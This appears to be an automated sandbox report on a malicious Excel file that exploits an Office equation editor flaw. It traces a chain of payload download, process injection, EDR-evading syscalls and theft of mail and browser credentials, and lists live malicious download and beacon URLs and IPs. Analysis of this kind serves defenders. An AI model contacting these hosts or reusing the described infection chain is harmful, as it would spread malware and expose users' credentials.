Remote System Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
Access Token Manipulation		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task312
Process Injection		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1539299 Sample: IND24072113.xlsx Startdate: 22/10/2024 Architecture: WINDOWS Score: 100 63 Malicious sample detected (through community Yara rule) 2->63 65 Antivirus / Scanner detection for submitted sample 2->65 67 Multi AV Scanner detection for submitted file 2->67 69 11 other signatures 2->69 11 EXCEL.EXE 7 10 2->11         started        process3 file4 39 C:\Users\user\Desktop\~$IND24072113.xlsx, data 11->39 dropped 14 EQNEDT32.EXE 12 11->14         started        process5 dnsIp6 55 timurtrading.my 192.3.255.145, 443, 49161, 49162 AS-COLOCROSSINGUS United States 14->55 43 C:\Users\user\AppData\Roaming\word.exe, PE32 14->43 dropped 45 C:\Users\user\AppData\...\kontempt2.1[1].exe, PE32 14->45 dropped 57 Installs new ROOT certificates 14->57 59 Office equation editor establishes network connection 14->59 61 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 14->61 19 word.exe 1 14->19         started        file7 signatures8 process9 signatures10 75 Machine Learning detection for dropped file 19->75 77 Writes to foreign memory regions 19->77 79 Maps a DLL or memory area into another process 19->79 81 2 other signatures 19->81 22 svchost.exe 19->22         started        process11 signatures12 83 Maps a DLL or memory area into another process 22->83 25 uAjPOONiWk.exe 22->25 injected process13 signatures14 85 Maps a DLL or memory area into another process 25->85 87 Found direct / indirect Syscall (likely to bypass EDR) 25->87 28 msinfo32.exe 1 20 25->28         started        process15 dnsIp16 53 www.sqlite.org 45.33.6.223, 49164, 80 LINODE-APLinodeLLCUS United States 28->53 41 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 28->41 dropped 89 Tries to steal Mail credentials (via file / registry access) 28->89 91 Tries to harvest and steal browser information (history, passwords, etc) 28->91 93 Maps a DLL or memory area into another process 28->93 95 Queues an APC in another process (thread injection) 28->95 33 uAjPOONiWk.exe 28->33 injected 37 firefox.exe 28->37         started        file17 signatures18 process19 dnsIp20 47 www.myprefpal.xyz 33->47 49 myprefpal.xyz 3.33.130.190, 49169, 49170, 49171 AMAZONEXPANSIONGB United States 33->49 51 4 other IPs or domains 33->51 71 Found direct / indirect Syscall (likely to bypass EDR) 33->71 signatures21 73 Performs DNS queries to domains with low reputation 47->73

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
IND24072113.xlsx68%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
IND24072113.xlsx100%AviraEXP/CVE-2017-11882.Gen

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\word.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\kontempt2.1[1].exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\sqlite3.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
https://duckduckgo.com/ac/?q=0%URL Reputationsafe
http://crl.entrust.net/server1.crl00%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
https://secure.comodo.com/CPS00%URL Reputationsafe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
http://www.sqlite.org/copyright.html.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
www.75e296qdx.top
185.196.10.234
truefalse
    		unknown
    myprefpal.xyz
    		3.33.130.190
    		truetrue
      		unknown
      timurtrading.my
      		192.3.255.145
      		truetrue
        		unknown
        www.sqlite.org
        		45.33.6.223
        		truefalse
          		unknown
          www.omnibizlux.biz
          		167.172.133.32
          		truefalse
            		unknown
            jilifish.win
            		15.197.148.33
            		truefalse
              		unknown
              www.myprefpal.xyz
              		unknown
              		unknowntrue
                		unknown
                www.jilifish.win
                		unknown
                		unknownfalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.omnibizlux.biz/8pmv/?DtMH=kxoTeT1hyx&2PV85pl=o+HDgodiamRQHtDMpIt6QXV1yFQyIuHAMV1gOVYcjWmvuGh+h7IrtYfSQO/kpwxsxn8zwcxo4M/m/nbjbIRZpxhbjjpUXySeQkriE3Dek1xl8vaSGOlLDW237/Cafalse
                    		unknown
                    http://www.75e296qdx.top/quvp/?2PV85pl=ZW1g+h73VjV8NmrD3A0IsvQAl9tCTvv5s7OxxnbN69qnRFmJveufixywo3eCJN9Bi9pNL2fgeIfBDTgJwEUErU/4IwV0Yt2V4k+CbVZpThcE8pzI6qgsTHE3GSfU&DtMH=kxoTeT1hyxfalse
                      		unknown
                      https://timurtrading.my/kontempt2.1.exetrue
                        		unknown
                        http://www.myprefpal.xyz/2xrt/?2PV85pl=t8QlsLf/hSao5OfTjGXyvO3SE3egRcZN/0WYGutq4Zw3gZ9pwtfqpd7Txie7AUKWMV3AhFtCGrZ0PcR2NtL0Erm7E7qQmCH1czZzhi0sD+dlnO4gaz+HrJe+v97h&DtMH=kxoTeT1hyxfalse
                          		unknown
                          http://www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zipfalse
                            		unknown
                            http://www.jilifish.win/to3j/false
                              		unknown
                              http://www.75e296qdx.top/quvp/false
                                		unknown
                                http://timurtrading.my/kontempt2.1.exetrue
                                  		unknown
                                  http://www.myprefpal.xyz/2xrt/false
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabmsinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://duckduckgo.com/ac/?q=msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://timurtrading.my/kontempt2.1.execEQNEDT32.EXE, 00000002.00000002.427177451.000000000061F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://support.google.com/chrome/?p=plugin_flashmsinfo32.exe, 00000008.00000003.541112304.0000000005F7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://timurtrading.my/kontempt2.1.exeppC:EQNEDT32.EXE, 00000002.00000002.427177451.000000000061F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchmsinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drfalse
                                              		unknown
                                              http://timurtrading.my/kontempt2.1.exeeEQNEDT32.EXE, 00000002.00000002.427177451.000000000061F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://timurtrading.my/kontempt2.1.exeroC:EQNEDT32.EXE, 00000002.00000002.427203634.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.426323426.00000000006DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://www.google.com/favicon.ico7yj1259-.8.drfalse
                                                    		unknown
                                                    https://ac.ecosia.org/autocomplete?q=msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://www.jilifish.winuAjPOONiWk.exe, 00000009.00000002.639998204.0000000005095000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        		unknown
                                                        https://timurtrading.my/EQNEDT32.EXE, 00000002.00000003.427086448.0000000000650000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427188921.0000000000651000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000003.426323426.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.427203634.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427059690.000000000069D000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.427104570.00000000006A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.sqlite.org/copyright.html.msinfo32.exe, 00000008.00000002.640641688.0000000061ED1000.00000008.00000001.01000000.00000008.sdmp, sqlite3.dll.8.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msinfo32.exe, 00000008.00000003.540875935.000000000038E000.00000004.00000020.00020000.00000000.sdmp, 7yj1259-.8.drfalse
                                                            		unknown

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            15.197.148.33
                                                            		jilifish.winUnited States
                                                            		7430TANDEMUSfalse
                                                            45.33.6.223
                                                            		www.sqlite.orgUnited States
                                                            		63949LINODE-APLinodeLLCUSfalse
                                                            167.172.133.32
                                                            		www.omnibizlux.bizUnited States
                                                            		14061DIGITALOCEAN-ASNUSfalse
                                                            192.3.255.145
                                                            		timurtrading.myUnited States
                                                            		36352AS-COLOCROSSINGUStrue
                                                            185.196.10.234
                                                            		www.75e296qdx.topSwitzerland
                                                            		42624SIMPLECARRIERCHfalse
                                                            3.33.130.190
                                                            		myprefpal.xyzUnited States
                                                            		8987AMAZONEXPANSIONGBtrue

                                                            General Information

                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1539299
                                                            Start date and time:2024-10-22 14:59:16 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 6s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                            Number of analysed new started processes analysed:11
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:IND24072113.xlsx
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.expl.evad.winXLSX@10/10@7/6
                                                            EGA Information:
                                                            • Successful, ratio: 80%
                                                            HCA Information:
                                                            • Successful, ratio: 82%
                                                            • Number of executed functions: 49
                                                            • Number of non-executed functions: 324
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .xlsx
                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                            • Attach to Office via COM
                                                            • Active ActiveX Object
                                                            • Scroll down
                                                            • Close Viewer

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: IND24072113.xlsx

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            09:00:42API Interceptor126x Sleep call for process: EQNEDT32.EXE modified
                                                            09:01:33API Interceptor559x Sleep call for process: uAjPOONiWk.exe modified
                                                            09:01:38API Interceptor116519x Sleep call for process: msinfo32.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            15.197.148.33ekte.exeGet hashmaliciousFormBookBrowse
                                                            • www.childlesscatlady.today/0l08/
                                                            IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                            • www.jilifish.win/to3j/
                                                            AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                            • www.1clickw2.net/9bnb/
                                                            BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                            • www.ethetf.digital/m7sk/
                                                            LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                            • www.warriorsyndrome.net/yaso/
                                                            firmware.armv5l.elfGet hashmaliciousUnknownBrowse
                                                            • 15.197.148.33/
                                                            firmware.mipsel.elfGet hashmaliciousUnknownBrowse
                                                            • 15.197.148.33/
                                                            firmware.sh4.elfGet hashmaliciousUnknownBrowse
                                                            • 15.197.148.33/
                                                            firmware.x86_64.elfGet hashmaliciousUnknownBrowse
                                                            • 15.197.148.33/
                                                            fptlVDDPkS.dllGet hashmaliciousQuasarBrowse
                                                            • freegeoip.net/xml/
                                                            45.33.6.223ekte.exeGet hashmaliciousFormBookBrowse
                                                            • www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
                                                            IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                            • www.sqlite.org/2022/sqlite-dll-win32-x86-3380000.zip
                                                            SOA-INV0892024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                            • www.sqlite.org/2020/sqlite-dll-win32-x86-3310000.zip
                                                            New PO-RFQ14101524.xla.xlsxGet hashmaliciousFormBookBrowse
                                                            • www.sqlite.org/2019/sqlite-dll-win32-x86-3280000.zip
                                                            BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                            • www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zip
                                                            FvYlbhvZrZ.rtfGet hashmaliciousFormBookBrowse
                                                            • www.sqlite.org/2020/sqlite-dll-win32-x86-3330000.zip
                                                            SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsxGet hashmaliciousFormBookBrowse
                                                            • www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
                                                            LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                            • www.sqlite.org/2017/sqlite-dll-win32-x86-3170000.zip
                                                            ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                            • www.sqlite.org/2018/sqlite-dll-win32-x86-3230000.zip
                                                            RFQ-TECMARKQATAR PO33109.xlsxGet hashmaliciousFormBookBrowse
                                                            • www.sqlite.org/2018/sqlite-dll-win32-x86-3240000.zip

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            www.omnibizlux.bizIND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                            • 167.172.133.32
                                                            www.sqlite.orgekte.exeGet hashmaliciousFormBookBrowse
                                                            • 45.33.6.223
                                                            IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                            • 45.33.6.223
                                                            SOA-INV0892024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                            • 45.33.6.223
                                                            New PO-RFQ14101524.xla.xlsxGet hashmaliciousFormBookBrowse
                                                            • 45.33.6.223
                                                            Thermo Fisher RFQ_TFS-1702.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 45.33.6.223
                                                            BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                            • 45.33.6.223
                                                            FvYlbhvZrZ.rtfGet hashmaliciousFormBookBrowse
                                                            • 45.33.6.223
                                                            SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsxGet hashmaliciousFormBookBrowse
                                                            • 45.33.6.223
                                                            LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                            • 45.33.6.223
                                                            ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                            • 45.33.6.223
                                                            www.75e296qdx.toprequest-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                            • 185.196.10.234
                                                            IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                            • 185.196.10.234
                                                            NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exeGet hashmaliciousUnknownBrowse
                                                            • 185.196.10.234
                                                            timurtrading.myIND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                            • 192.3.255.145
                                                            Request For Quotation- PO22719.xlsxGet hashmaliciousFormBookBrowse
                                                            • 134.255.233.189

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            DIGITALOCEAN-ASNUShttps://sites.google.com/view/hffgshfgsqfgsqf/homeGet hashmaliciousUnknownBrowse
                                                            • 138.68.75.10
                                                            la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                            • 103.253.147.242
                                                            la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                            • 103.253.147.242
                                                            https://mlbmajorlossbuilders.hbportal.co/flow/66fdd3a6c031cc001f728831/view?hash=54079a777636a614d8d961b5b9a96a5fGet hashmaliciousUnknownBrowse
                                                            • 159.89.102.253
                                                            request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                            • 167.99.212.139
                                                            IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                            • 167.172.133.32
                                                            SecuriteInfo.com.Win32.CrypterX-gen.19670.22903.exeGet hashmaliciousLokibotBrowse
                                                            • 104.248.205.66
                                                            eJeQNTcb4A.exeGet hashmaliciousMetasploitBrowse
                                                            • 188.166.177.132
                                                            m8ufsTLLOU.exeGet hashmaliciousMetasploitBrowse
                                                            • 188.166.177.132
                                                            VInxSo1xrN.exeGet hashmaliciousMetasploitBrowse
                                                            • 188.166.177.132
                                                            AS-COLOCROSSINGUSPaymentXConfirmationXcopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                            • 172.245.123.45
                                                            la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                            • 192.3.165.37
                                                            Payment Advice080.xlsGet hashmaliciousUnknownBrowse
                                                            • 192.3.176.141
                                                            76.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                            • 198.46.178.134
                                                            Purchase order.xlsGet hashmaliciousUnknownBrowse
                                                            • 192.3.176.141
                                                            Proforma_Inv07.xlsGet hashmaliciousUnknownBrowse
                                                            • 198.144.178.173
                                                            Thermo Fisher RFQ_TFS-1702.xlsGet hashmaliciousUnknownBrowse
                                                            • 192.3.101.157
                                                            PO-1021202416777 PNG2023-W111.xlsGet hashmaliciousUnknownBrowse
                                                            • 23.94.171.157
                                                            SUNLIGHT ORDER.xlsGet hashmaliciousUnknownBrowse
                                                            • 172.245.123.45
                                                            IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                            • 192.3.255.145
                                                            TANDEMUShttp://manatoki463.netGet hashmaliciousUnknownBrowse
                                                            • 15.197.193.217
                                                            la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                            • 15.196.223.166
                                                            la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                            • 128.88.14.231
                                                            ekte.exeGet hashmaliciousFormBookBrowse
                                                            • 15.197.148.33
                                                            IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                            • 15.197.148.33
                                                            la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                            • 155.208.85.234
                                                            spc.elfGet hashmaliciousMiraiBrowse
                                                            • 16.252.73.149
                                                            sh4.elfGet hashmaliciousMiraiBrowse
                                                            • 15.198.96.79
                                                            na.elfGet hashmaliciousMiraiBrowse
                                                            • 16.252.73.153
                                                            DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                            • 15.197.204.56
                                                            LINODE-APLinodeLLCUSPO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                            • 178.79.184.196
                                                            meow.arm.elfGet hashmaliciousUnknownBrowse
                                                            • 172.105.120.101
                                                            meow.arm7.elfGet hashmaliciousUnknownBrowse
                                                            • 172.105.109.175
                                                            ekte.exeGet hashmaliciousFormBookBrowse
                                                            • 45.33.6.223
                                                            IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                            • 45.33.6.223
                                                            la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                            • 172.104.125.52
                                                            sparc.elfGet hashmaliciousUnknownBrowse
                                                            • 103.3.63.184
                                                            la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                            • 198.74.57.190
                                                            SOA-INV0892024.xla.xlsxGet hashmaliciousFormBookBrowse
                                                            • 45.33.6.223
                                                            arm.elfGet hashmaliciousMiraiBrowse
                                                            • 45.79.58.115

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            7dcce5b76c8b17472d024758970a406bPaymentXConfirmationXcopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                            • 192.3.255.145
                                                            Payment Advice080.xlsGet hashmaliciousUnknownBrowse
                                                            • 192.3.255.145
                                                            Purchase order.xlsGet hashmaliciousUnknownBrowse
                                                            • 192.3.255.145
                                                            Payment Advice080.xlsGet hashmaliciousUnknownBrowse
                                                            • 192.3.255.145
                                                            Purchase order.xlsGet hashmaliciousUnknownBrowse
                                                            • 192.3.255.145
                                                            Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                            • 192.3.255.145
                                                            Proforma_Inv07.xlsGet hashmaliciousUnknownBrowse
                                                            • 192.3.255.145
                                                            Thermo Fisher RFQ_TFS-1702.xlsGet hashmaliciousUnknownBrowse
                                                            • 192.3.255.145
                                                            PO-1021202416777 PNG2023-W111.xlsGet hashmaliciousUnknownBrowse
                                                            • 192.3.255.145
                                                            Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                            • 192.3.255.145

                                                            Dropped Files

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            C:\Users\user\AppData\Local\Temp\sqlite3.dllIND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                              ORDER_23CA0604.xlsGet hashmaliciousFormBookBrowse
                                                                ref_62334_DUBIA_RE_Order_Request_-_1712.xlsGet hashmaliciousFormBookBrowse
                                                                  OrderP.O_R477304.xlsGet hashmaliciousFormBookBrowse
                                                                    SecuriteInfo.com.Exploit.CVE-2018-0798.4.23192.12875.rtfGet hashmaliciousFormBookBrowse
                                                                      220062.xlsGet hashmaliciousFormBookBrowse
                                                                        P.O 10102022.xlsxGet hashmaliciousFormBookBrowse

                                                                          Created / dropped Files

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\kontempt2.1[1].htm

                                                                          Download File
                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):162
                                                                          Entropy (8bit):4.43530643106624
                                                                          Encrypted:false
                                                                          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
                                                                          MD5:4F8E702CC244EC5D4DE32740C0ECBD97
                                                                          SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
                                                                          SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
                                                                          SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..

